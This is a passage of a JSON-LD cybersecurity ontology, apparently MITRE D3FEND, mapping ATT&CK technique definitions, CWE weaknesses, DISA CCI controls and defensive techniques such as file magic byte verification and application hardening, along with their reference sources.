      "rdfs:label": "Hardware-based Write Protection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:Nddc1a7d4e81c416793a0c0569b39982c"
        }
      ]
    },
    {
      "@id": "_:Nddc1a7d4e81c416793a0c0569b39982c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SecondaryStorage"
      }
    },
    {
      "@id": "d3f:T0859",
      "@type": "owl:Class",
      "d3f:attack-id": "T0859",
      "d3f:definition": "Adversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way.",
      "rdfs:label": "Valid Accounts - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSLateralMovementTechnique"
        },
        {
          "@id": "d3f:ATTACKICSPersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Valid Accounts"
    },
    {
      "@id": "d3f:CCI-001496_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to protect the integrity of audit tools.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:FileEncryption"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-29T00:00:00"
      },
      "rdfs:label": "CCI-001496"
    },
    {
      "@id": "d3f:CCI-002359_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements a reference monitor for organization-defined access control policies that is small enough to be subject to analysis and testing, the completeness of which can be assured.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-25T00:00:00"
      },
      "rdfs:label": "CCI-002359"
    },
    {
      "@id": "d3f:Reference-AccessPermissionModification_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-07-001/"
      },
      "d3f:kb-abstract": "Adversaries sometimes modify object access rights at the operating system level. There are varying motivations behind this action - they may not want some files/objects to be changed on systems for persistence reasons and therefore provide admin only rights; also, they may want files to be accessible with lower levels of permissions.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemFileAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-07-001: Access Permission Modification",
      "rdfs:label": "Reference - CAR-2019-07-001: Access Permission Modification - MITRE"
    },
    {
      "@id": "d3f:LinuxUnlinkat",
      "@type": "owl:Class",
      "d3f:definition": "Delete a name and possibly the file it refers to. Different parameter handling than Linux Unlink",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/unlinkat.2.html"
      },
      "rdfs:label": "Linux Unlinkat",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIDeleteFile"
      }
    },
    {
      "@id": "d3f:TFTPServer",
      "@type": "owl:Class",
      "d3f:definition": "Trivial File Transfer Protocol (TFTP) is a simple file transfer protocol, typically used to automatically transfer configuration or boot files between machines.  It is used where user authentication and directory visibility are not required.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Trivial_File_Transfer_Protocol"
      },
      "rdfs:label": "TFTP Server",
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:CWE-1045",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1045",
      "d3f:definition": "A parent class has a virtual destructor method, but the parent has a child class that does not have a virtual destructor.",
      "rdfs:label": "Parent Class with a Virtual Destructor and a Child Class without a Virtual Destructor",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:T1003.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1003.006",
      "d3f:definition": "Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.",
      "d3f:may-modify": {
        "@id": "d3f:EventLog"
      },
      "d3f:produces": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "rdfs:label": "DCSync",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:Nb1808c295bc54c85a62400727d7e5d6b"
        },
        {
          "@id": "_:Ne3e389f426cf4881b5aff68f23bc6c99"
        }
      ]
    },
    {
      "@id": "_:Nb1808c295bc54c85a62400727d7e5d6b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "_:Ne3e389f426cf4881b5aff68f23bc6c99",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "d3f:FileMagicByteVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileMagicByteVerification"
      ],
      "d3f:analyzes": {
        "@id": "d3f:FileMagicBytes"
      },
      "d3f:d3fend-id": "D3-FMBV",
      "d3f:definition": "Utilizing the magic number to verify the file",
      "d3f:kb-article": "## How it works\n\nMany file formats use magic numbers to identify a file format or protocol. Verifying that the magic number matches the expected value of its declared format is a simple way of verifying the file format.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CarvingContiguousandFragmentedFilesWithFastObjectValidation"
        },
        {
          "@id": "d3f:Reference-GatheringEvidenceModel-DrivenSoftwareEngineeringinAutomatedDigitalForensics"
        }
      ],
      "rdfs:label": "File Magic Byte Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileMetadataValueVerification"
        },
        {
          "@id": "_:Naa522e80c11e42d1af0930505e53e2aa"
        }
      ]
    },
    {
      "@id": "_:Naa522e80c11e42d1af0930505e53e2aa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileMagicBytes"
      }
    },
    {
      "@id": "d3f:CWE-605",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-605",
      "d3f:definition": "When multiple sockets are allowed to bind to the same port, other services on that port may be stolen or spoofed.",
      "rdfs:label": "Multiple Binds to the Same Port",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-666"
        },
        {
          "@id": "d3f:CWE-675"
        }
      ]
    },
    {
      "@id": "d3f:T1481.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1481.001",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.",
      "rdfs:label": "Dead Drop Resolver - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1481"
      },
      "skos:prefLabel": "Dead Drop Resolver"
    },
    {
      "@id": "d3f:T1499.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1499.003",
      "d3f:definition": "Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)",
      "rdfs:label": "Application Exhaustion Flood",
      "rdfs:subClassOf": {
        "@id": "d3f:T1499"
      }
    },
    {
      "@id": "d3f:RankCorrelationCoefficient",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RC",
      "d3f:definition": "A rank correlation is any of several statistics that measure an ordinal association-the relationship between rankings of different ordinal variables or different rankings of the same variable, where a \"ranking\" is the assignment of the ordering labels \"first\", \"second\", \"third\", etc. to different observations of a particular variable.",
      "d3f:kb-article": "Wikipedia. (n.d.). Rank correlation. [Link](https://en.wikipedia.org/wiki/Rank_correlation)",
      "rdfs:label": "Rank Correlation",
      "rdfs:subClassOf": {
        "@id": "d3f:Correlation"
      }
    },
    {
      "@id": "d3f:CWE-1313",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1313",
      "d3f:definition": "During runtime, the hardware allows for test or debug logic (feature) to be activated, which allows for changing the state of the hardware. This feature can alter the intended behavior of the system and allow for alteration and leakage of sensitive data by an adversary.",
      "rdfs:label": "Hardware Allows Activation of Test or Debug Logic at Runtime",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:CCI-001109_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system at managed interfaces denies network communications traffic by default and allows network communications traffic by exception (i.e., deny all, permit by exception).",
      "d3f:exactly": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001109"
    },
    {
      "@id": "d3f:WindowsRegistryKeyImportEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where registry key data is imported into the Windows Registry from an external source.",
      "rdfs:label": "Windows Registry Key Import Event",
      "rdfs:subClassOf": {
        "@id": "d3f:WindowsRegistryKeyEvent"
      }
    },
    {
      "@id": "d3f:CCI-001632_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization protects nonlocal maintenance sessions by separating the maintenance session from other network sessions with the information system by either physically separated communications paths or logically separated communications paths based upon encryption.",
      "d3f:exactly": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-12T00:00:00"
      },
      "rdfs:label": "CCI-001632"
    },
    {
      "@id": "d3f:T1637.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1637.001",
      "d3f:definition": "Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1637/001) (DGAs) to procedurally generate domain names for uses such as command and control communication   or malicious application distribution.(Citation: securelist rotexy 2018)",
      "rdfs:label": "Domain Generation Algorithms - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1637"
      },
      "skos:prefLabel": "Domain Generation Algorithms"
    },
    {
      "@id": "d3f:CryptographicKey",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In cryptography, a key is a piece of information (a parameter) that determines the functional output of a cryptographic algorithm. For encryption algorithms, a key specifies the transformation of plaintext into ciphertext, and vice versa for decryption algorithms. Keys also specify transformations in other cryptographic algorithms, such as digital signature schemes and message authentication codes.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Public-key_cryptography"
      },
      "rdfs:label": "Cryptographic Key",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:Variability",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-VAR",
      "d3f:definition": "Dispersion (also called variability, scatter, or spread) is the extent to which a distribution is stretched or squeezed. A measure of statistical dispersion is a nonnegative real number that is zero if all the data are the same and increases as the data become more diverse.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Statistical dispersion. [Link](https://en.wikipedia.org/wiki/Statistical_dispersion)",
      "rdfs:label": "Variability",
      "rdfs:subClassOf": {
        "@id": "d3f:DescriptiveStatistics"
      }
    },
    {
      "@id": "d3f:IPAddress",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An Internet Protocol address (IP address) is a numerical label assigned to each device connected to a computer network that uses the Internet Protocol for communication.An IP address serves two main functions: host or network interface identification and location addressing. Internet Protocol version 4 (IPv4) defines an IP address as a 32-bit number. However, because of the growth of the Internet and the depletion of available IPv4 addresses, a new version of IP (IPv6), using 128 bits for the IP address, was standardized in 1998. IPv6 deployment has been ongoing since the mid-2000s.",
      "d3f:identifies": {
        "@id": "d3f:NetworkNode"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:IP_address"
      },
      "rdfs:label": "IP Address",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Identifier"
        },
        {
          "@id": "_:N4d36f912e73b4734a32ff99e2280efa6"
        }
      ]
    },
    {
      "@id": "_:N4d36f912e73b4734a32ff99e2280efa6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkNode"
      }
    },
    {
      "@id": "d3f:PowershellScriptFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableScript"
      ],
      "rdfs:label": "Powershell Script File"
    },
    {
      "@id": "d3f:CWE-1303",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1303",
      "d3f:definition": "Hardware structures shared across execution contexts (e.g., caches and branch predictors) can violate the expected architecture isolation between contexts.",
      "rdfs:label": "Non-Transparent Sharing of Microarchitectural Resources",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1189"
        },
        {
          "@id": "d3f:CWE-203"
        }
      ]
    },
    {
      "@id": "d3f:CWE-256",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-256",
      "d3f:definition": "Storing a password in plaintext may result in a system compromise.",
      "rdfs:label": "Plaintext Storage of a Password",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-522"
      }
    },
    {
      "@id": "d3f:T1055",
      "@type": "owl:Class",
      "d3f:attack-id": "T1055",
      "d3f:definition": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.",
      "rdfs:label": "Process Injection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1074",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1074",
      "d3f:definition": "A class has an inheritance level that is too high, i.e., it has a large number of parent classes.",
      "rdfs:label": "Class with Excessively Deep Inheritance",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1093"
      }
    },
    {
      "@id": "d3f:CWE-621",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-621",
      "d3f:definition": "The product uses external input to determine the names of variables into which information is extracted, without verifying that the names of the specified variables are valid. This could cause the program to overwrite unintended variables.",
      "d3f:synonym": "Variable overwrite",
      "rdfs:label": "Variable Extraction Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-914"
      }
    },
    {
      "@id": "d3f:ApplicationHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ApplicationHardening"
      ],
      "d3f:d3fend-id": "D3-AH",
      "d3f:definition": "Application Hardening makes an executable application more resilient to a class of exploits which either introduce new code or execute unwanted existing code. These techniques may be applied at compile-time or on an application binary.",
      "d3f:enables": {
        "@id": "d3f:Harden"
      },
      "d3f:kb-article": "## Technique Overview\n\nExploits may, for example, rely on knowledge of addresses in a process's memory, they may alter memory contents, and they may cause a program to use instructions in a way that they were not intended.  By, for example, including code that dynamically changes the memory address of data or code on each run, introducing logic to validating the memory contents before certain potentially dangerous flows are executed, or monitoring a program for unusual sequence of instructions, this makes it harder for an attacker to craft a working exploit.",
      "d3f:synonym": "Process Hardening",
      "rdfs:label": "Application Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N4b37cfae6fa5484482879f6f183fe777"
        }
      ]
    },
    {
      "@id": "_:N4b37cfae6fa5484482879f6f183fe777",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Harden"
      }
    },
    {
      "@id": "d3f:ScheduledJob",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contained-by": {
        "@id": "d3f:JobSchedule"
      },
      "d3f:created-by": {
        "@id": "d3f:JobSchedulerSoftware"
      },
      "d3f:definition": "A task scheduler process is an operating system process that executes scheduled tasks (time-scheduling in the sense of wall clock time; not operating system scheduling of processes for multitasking).",
      "d3f:modified-by": {
        "@id": "d3f:JobSchedulerSoftware"
      },
      "d3f:synonym": [
        "Scheduled Task",
        "Task Scheduler Process"
      ],
      "rdfs:label": "Scheduled Job",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Cron"
        },
        {
          "@id": "dbr:Windows_Task_Scheduler"
        },
        {
          "@id": "https://linux.die.net/man/1/at"
        },
        {
          "@id": "https://schema.ocsf.io/objects/job"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemProcess"
        },
        {
          "@id": "_:N0b5fa1bbf490447d8d79651ccb8c1363"
        },
        {
          "@id": "_:N0a5c81c7674c43dcb27b8cfa5ec25c9d"
        },
        {
          "@id": "_:Nd3815f94e03a4f8b8ef64e4215d9dd22"
        }
      ]
    },
    {
      "@id": "_:N0b5fa1bbf490447d8d79651ccb8c1363",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contained-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedule"
      }
    },
    {
      "@id": "_:N0a5c81c7674c43dcb27b8cfa5ec25c9d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:created-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedulerSoftware"
      }
    },
    {
      "@id": "_:Nd3815f94e03a4f8b8ef64e4215d9dd22",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modified-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedulerSoftware"
      }
    },
    {
      "@id": "d3f:Reference-WhatisHardwareWriteProtect",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.yokogawa.com/us/library/resources/faqs/pressure-what-is-hardware-write-protect/#:~:text=The%20hardware%20write%20protection%20is,Burn%20Out%20(BO)%20switch"
      },
      "d3f:kb-abstract": "Transmitters used in safety systems, environmentally sensitive applications, custody transfer, or critical processes need to be secure from tampering or inadvertent changes to their setup that may lead to errors and failures. Yokogawa’s pressure transmitters have the security of a Software Write Protection (Password) and a Hardware Write Protection (Switch) to secure programming changes and physical cover locks to secure the transmitter electronics. These security features can be applied independently or in combination to build the level of security desired.",
      "d3f:kb-author": "YOKOGAWA",
      "d3f:kb-reference-of": {
        "@id": "d3f:Hardware-basedWriteProtection"
      },
      "d3f:kb-reference-title": "What is Hardware Write Protect?",
      "rdfs:label": "Reference - What is Hardware Write Protect?"
    },
    {
      "@id": "d3f:PermissionRevokingEvent",
      "@type": "owl:Class",
      "d3f:definition": "An administrative event entailing the withdrawal of previously granted access rights, reconfiguring permissions to prevent a subject from performing specific actions on a resource, in accordance with updated access policies.",
      "rdfs:label": "Permission Revoking Event",
      "rdfs:subClassOf": {
        "@id": "d3f:AccessControlAdministrationEvent"
      }
    },
    {
      "@id": "d3f:CWE-466",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-466",
      "d3f:definition": "A function can return a pointer to memory that is outside of the buffer that the pointer is expected to reference.",
      "rdfs:label": "Return of Pointer Value Outside of Expected Range",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-119"
      }
    },
    {
      "@id": "d3f:Reference-QualysNetworkPassiveSensorGettingStartedGuide",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.qualys.com/passive-scanning-sensor/"
      },
      "d3f:kb-abstract": "Qualys Passive Scanning Sensor (PS) continuously monitors all network traffic and flags any asset activity. It identifies and profiles devices the moment they connect to the network, including those difficult to scan, corporate owned, brought by employees, and rogue IT. The data is sent immediately to the Qualys Cloud Platform for centralized analysis.",
      "d3f:kb-organization": "Qualys",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:HardwareComponentInventory"
        },
        {
          "@id": "d3f:NetworkNodeInventory"
        }
      ],
      "d3f:kb-reference-title": "Qualys Network Passive Sensor Getting Started Guide",
      "rdfs:label": "Reference - Qualys Network Passive Sensor Getting Started Guide"
    },
    {
      "@id": "d3f:configures",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x configures y: The entity x sets the operational parameters of entity y, determining how y will operate.",
      "rdfs:label": "configures",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:T1150",
      "@type": "owl:Class",
      "d3f:attack-id": "T1150",
      "d3f:definition": "Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as <code>/Library/Preferences</code> (which execute with elevated privileges) and <code>~/Library/Preferences</code> (which execute with a user's privileges).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.011",
      "rdfs:label": "Plist Modification",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.011"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:ATLASExecutionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0005"
      },
      "rdfs:label": "Execution Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N347acda9ab3b4e0abf49930c04875ac8"
        }
      ],
      "skos:prefLabel": "Execution Technique"
    },
    {
      "@id": "_:N347acda9ab3b4e0abf49930c04875ac8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0005"
      }
    },
    {
      "@id": "d3f:T1565.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1565.001",
      "d3f:definition": "Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.",
      "d3f:modifies": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Stored Data Manipulation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1565"
        },
        {
          "@id": "_:N8342c0882e0841b89b1ad2ce981254e9"
        }
      ]
    },
    {
      "@id": "_:N8342c0882e0841b89b1ad2ce981254e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:OperationsCenterComputer",
      "@type": "owl:Class",
      "d3f:definition": "Mainframe computers or mainframes (colloquially referred to as \"big iron\") are computers used primarily by large organizations for critical applications; bulk data processing, such as census, industry and consumer statistics, and enterprise resource planning; and transaction processing. They are larger and have more processing power than some other classes of computers: minicomputers, servers, workstations, and personal computers.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Mainframe_computer"
      },
      "rdfs:label": "Operations Center Computer",
      "rdfs:seeAlso": {
        "@id": "dbr:Time-sharing"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SharedComputer"
      },
      "skos:altLabel": "Mainframe"
    },
    {
      "@id": "d3f:T1184",
      "@type": "owl:Class",
      "d3f:attack-id": "T1184",
      "d3f:definition": "Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1563.001",
      "rdfs:label": "SSH Hijacking",
      "rdfs:seeAlso": {
        "@id": "d3f:T1563.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LateralMovementTechnique"
      }
    },
    {
      "@id": "d3f:T1418",
      "@type": "owl:Class",
      "d3f:attack-id": "T1418",
      "d3f:definition": "Adversaries may attempt to get a listing of applications that are installed on a device. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1418) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempt specific actions.",
      "rdfs:label": "Software Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "Software Discovery"
    },
    {
      "@id": "d3f:CWE-680",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-680",
      "d3f:definition": "The product performs a calculation to determine how much memory to allocate, but an integer overflow can occur that causes less memory to be allocated than expected, leading to a buffer overflow.",
      "rdfs:label": "Integer Overflow to Buffer Overflow",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-119"
        },
        {
          "@id": "d3f:CWE-190"
        }
      ]
    },
    {
      "@id": "d3f:CWE-105",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-105",
      "d3f:definition": "The product has a form field that is not validated by a corresponding validation form, which can introduce other weaknesses related to insufficient input validation.",
      "rdfs:label": "Struts: Form Field Without Validator",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1173"
      }
    },
    {
      "@id": "d3f:TabletComputer",
      "@type": "owl:Class",
      "d3f:definition": "A tablet computer, commonly shortened to tablet, is a mobile device, typically with a mobile operating system and touchscreen display, processing circuitry, and a rechargeable battery in a single, thin and flat package. Tablets, being computers, do what other personal computers do, but lack some input/output (I/O) abilities that others have. Modern tablets largely resemble modern smartphones, the only differences being that tablets are relatively larger than smartphones, with screens 7 inches (18 cm) or larger, measured diagonally, and may not support access to a cellular network.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Tablet_computer"
      },
      "rdfs:label": "Tablet Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:PersonalComputer"
      },
      "skos:altLabel": "Tablet"
    },
    {
      "@id": "d3f:T1476",
      "@type": "owl:Class",
      "d3f:attack-id": "T1476",
      "d3f:definition": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Deliver Malicious App via Other Means - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Deliver Malicious App via Other Means"
    },
    {
      "@id": "d3f:Reference-PowershellExecution_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-04-003/"
      },
      "d3f:kb-abstract": "PowerShell is a scripting environment included with Windows that is used by both attackers and administrators. Execution of PowerShell scripts in most Windows versions is opaque and not typically secured by antivirus which makes using PowerShell an easy way to circumvent security measures. This analytic detects execution of PowerShell scripts.\n\nPowershell can be used to hide monitored command line execution such as:\n\n* net use\n* sc start",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-04-003: Powershell Execution",
      "rdfs:label": "Reference - CAR-2014-04-003: Powershell Execution - MITRE"
    },
    {
      "@id": "d3f:DS0006",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Credential material, such as session cookies or tokens, used to authenticate to web applications and services",
      "rdfs:comment": "This data source captures events relating to web credentials and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Web Credential (ATT&CK DS)"
    },
    {
